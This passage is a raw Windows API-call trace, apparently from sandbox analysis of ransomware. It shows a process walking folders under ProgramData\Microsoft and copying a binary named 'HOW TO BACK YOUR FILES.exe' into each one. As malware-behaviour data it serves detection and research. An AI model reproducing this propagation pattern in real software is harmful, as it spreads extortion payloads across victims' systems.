| out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.635] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\event viewer\\views\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.635] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.636] GetLastError () returned 0x0 [0090.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.636] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.636] CloseHandle (hObject=0x120) returned 1 [0090.636] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.636] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.636] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.636] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode" [0090.636] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.636] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0090.636] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned 106 [0090.636] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode" [0090.636] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.636] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\event viewer\\views\\applicationviewsrootnode\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.637] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.637] GetLastError () returned 0x0 [0090.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.637] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.637] CloseHandle (hObject=0x120) returned 1 [0090.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.637] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.637] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.638] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome" [0090.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3210f8 | out: hHeap=0x2b0000) returned 1 [0090.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0090.638] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome") returned 68 [0090.638] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome" [0090.638] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.638] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\ehome\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.638] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.638] GetLastError () returned 0x0 [0090.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.639] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.639] CloseHandle (hObject=0x120) returned 1 [0090.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.639] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.639] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4c6f4140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6f4140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.639] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome\\logs", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome\\logs") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome\\logs" [0090.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3351a8 | out: hHeap=0x2b0000) returned 1 [0090.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0090.639] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome\\logs") returned 73 [0090.639] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome\\logs" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome\\logs") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome\\logs" [0090.639] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.639] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome\\logs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\ehome\\logs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.640] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.640] GetLastError () returned 0x0 [0090.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.640] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.640] CloseHandle (hObject=0x120) returned 1 [0090.640] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.640] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.640] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.640] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM" [0090.640] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0090.640] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0090.640] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM") returned 66 [0090.640] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM" [0090.641] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.641] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\drm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.641] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.641] GetLastError () returned 0x0 [0090.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.641] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.641] CloseHandle (hObject=0x120) returned 1 [0090.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.641] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.641] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.642] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM\\Server", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM\\Server") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM\\Server" [0090.642] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3351a8 | out: hHeap=0x2b0000) returned 1 [0090.642] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0090.642] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM\\Server") returned 73 [0090.642] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM\\Server" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM\\Server") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM\\Server" [0090.642] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.642] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM\\Server\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\drm\\server\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.642] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.643] GetLastError () returned 0x0 [0090.643] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.643] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.643] CloseHandle (hObject=0x120) returned 1 [0090.643] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.643] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.643] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.643] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DeviceSync", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DeviceSync") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DeviceSync" [0090.643] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335108 | out: hHeap=0x2b0000) returned 1 [0090.643] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0090.643] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DeviceSync") returned 73 [0090.643] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DeviceSync" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DeviceSync") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DeviceSync" [0090.643] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.643] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DeviceSync\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\devicesync\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.644] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.656] GetLastError () returned 0x0 [0090.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.656] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.656] CloseHandle (hObject=0x120) returned 1 [0090.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.656] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.656] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\DeviceSync\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.657] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage" [0090.657] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0090.657] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0090.657] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage") returned 75 [0090.657] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage" [0090.657] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.657] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\device stage\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.657] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.658] GetLastError () returned 0x0 [0090.658] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.658] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.658] CloseHandle (hObject=0x120) returned 1 [0090.658] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.658] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.658] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.658] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task" [0090.658] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e27c0 | out: hHeap=0x2b0000) returned 1 [0090.658] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0090.658] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task") returned 80 [0090.658] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task" [0090.658] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.658] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\device stage\\task\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.659] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.659] GetLastError () returned 0x0 [0090.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.659] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.659] CloseHandle (hObject=0x120) returned 1 [0090.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.659] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.659] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, 